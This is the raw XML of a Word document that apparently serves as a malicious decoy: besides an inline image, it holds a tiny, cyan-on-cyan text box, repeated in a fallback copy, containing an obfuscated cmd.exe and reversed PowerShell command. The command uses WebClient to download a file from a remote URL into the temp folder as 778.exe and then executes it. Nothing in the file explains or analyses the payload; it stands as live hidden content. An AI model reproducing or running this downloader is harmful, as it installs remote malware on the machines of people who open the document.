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6C2BFA" w14:textId="2642DDEE" w:rsidR="00597331" w:rsidRDefault="008C4A54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0CF80CA" wp14:editId="70718C4E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6731</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="45719" cy="45719"/>
                <wp:effectExtent l="0" t="0" r="12065" b="12065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flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="45719" cy="45719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6350">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="24BDB96D" w14:textId="7A6E6BC5" w:rsidR="008C4A54" w:rsidRPr="008C4A54" w:rsidRDefault="008C4A54">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="200"/>
                                <w:szCs w:val="200"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="008C4A54">
                              <w:rPr>
                                <w:sz w:val="200"/>
                                <w:szCs w:val="200"/>
                              </w:rPr>
                              <w:t>c:\SmvBRStUrnftb\AlzRjRdifc\bzmjvTKbjUC\..\..\..\windows\system32\cmd.exe /c %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ProgramData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:~0,1%%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ProgramData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:~9,2% /V/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C"set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 4L=;'LMZ'=bid$}}{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hctac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}};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kaerb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;'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lzO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'=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QhQ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$;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pLw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$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metI-ekovnI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{ )00008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eg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-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htgnel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.)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pLw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$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metI-teG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((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fI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;'EYW'=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KPr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$;)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pLw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 ,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jhV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$(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eliFdaolnwoD.bDX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${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yrt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{)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Mlp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$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ni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jhV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$(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hcaerof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;'exe.'+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Tmp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$+'\'+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pmet:vne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$=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pLw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$;'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BlS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'=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lmN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$;'778' = Tmp$;'dlO'=buz$;)'@'(tilpS.'sdd.01onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=Mlp$;tneilCbeW.teN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tcejbo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-wen=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bDX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$;'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DEr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>'=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cGp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$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llehsrewop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&amp;&amp;for /L %Q in (356,-1,0)do set 9qm=!9qm!!4L:~%Q,1!&amp;&amp;if %Q </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="008C4A54">
                              <w:rPr>
                                <w:sz w:val="200"/>
                                <w:szCs w:val="200"/>
                              </w:rPr>
                              <w:t>leq</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="008C4A54">
                              <w:rPr>
                                <w:sz w:val="200"/>
                                <w:szCs w:val="200"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 0 call %9qm:~-357%"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0CF80CA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0;margin-top:.55pt;width:3.6pt;height:3.6pt;flip:x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" fillcolor="#00b0f0" strokecolor="#00b0f0" strokeweight=".5pt">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="24BDB96D" w14:textId="7A6E6BC5" w:rsidR="008C4A54" w:rsidRPr="008C4A54" w:rsidRDefault="008C4A54">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="200"/>
                          <w:szCs w:val="200"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008C4A54">
                        <w:rPr>
                          <w:sz w:val="200"/>
                          <w:szCs w:val="200"/>
                        </w:rPr>
                        <w:t>c:\SmvBRStUrnftb\AlzRjRdifc\bzmjvTKbjUC\..\..\..\windows\system32\cmd.exe /c %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ProgramData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:~0,1%%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ProgramData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:~9,2% /V/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C"set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 4L=;'LMZ'=bid$}}{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hctac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}};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kaerb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;'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lzO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'=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QhQ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$;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pLw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$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metI-ekovnI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{ )00008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eg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-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htgnel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.)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pLw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$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metI-teG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((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fI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;'EYW'=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KPr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$;)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pLw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 ,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jhV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$(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eliFdaolnwoD.bDX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${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yrt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{)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Mlp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$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ni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jhV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$(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hcaerof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;'exe.'+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Tmp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$+'\'+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pmet:vne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$=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pLw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$;'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BlS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'=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lmN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$;'778' = Tmp$;'dlO'=buz$;)'@'(tilpS.'sdd.01onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=Mlp$;tneilCbeW.teN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tcejbo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-wen=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bDX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$;'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DEr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>'=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cGp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$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llehsrewop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&amp;&amp;for /L %Q in (356,-1,0)do set 9qm=!9qm!!4L:~%Q,1!&amp;&amp;if %Q </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="008C4A54">
                        <w:rPr>
                          <w:sz w:val="200"/>
                          <w:szCs w:val="200"/>
                        </w:rPr>
                        <w:t>leq</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="008C4A54">
                        <w:rPr>
                          <w:sz w:val="200"/>
                          <w:szCs w:val="200"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 0 call %9qm:~-357%"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97331" w:rsidRPr="0020422A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CEC0CA1" wp14:editId="6E48C5F4">
            <wp:extent cx="5617845" cy="1682750"/>
            <wp:effectExtent l="0" t="0" r="190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7845" cy="1682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5BDFC15A" w14:textId="76AD602D" w:rsidR="00597331" w:rsidRDefault="00597331"/>
    <w:p w14:paraId="320987FE" w14:textId="7C56B877" w:rsidR="00597331" w:rsidRDefault="00597331"/>
    <w:sectPr w:rsidR="005973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7331"/>
    <w:rsid w:val="00597331"/>
    <w:rsid w:val="007B37CB"/>
    <w:rsid w:val="007F3A04"/>
    <w:rsid w:val="008C4A54"/>
    <w:rsid w:val="00F224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524E17"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7D145F45-7675-4409-9A10-4C1F295487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903B9B-B50A-4450-8256-708E29ADCE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Brandon</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Brandon</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-25T00:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-25T00:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>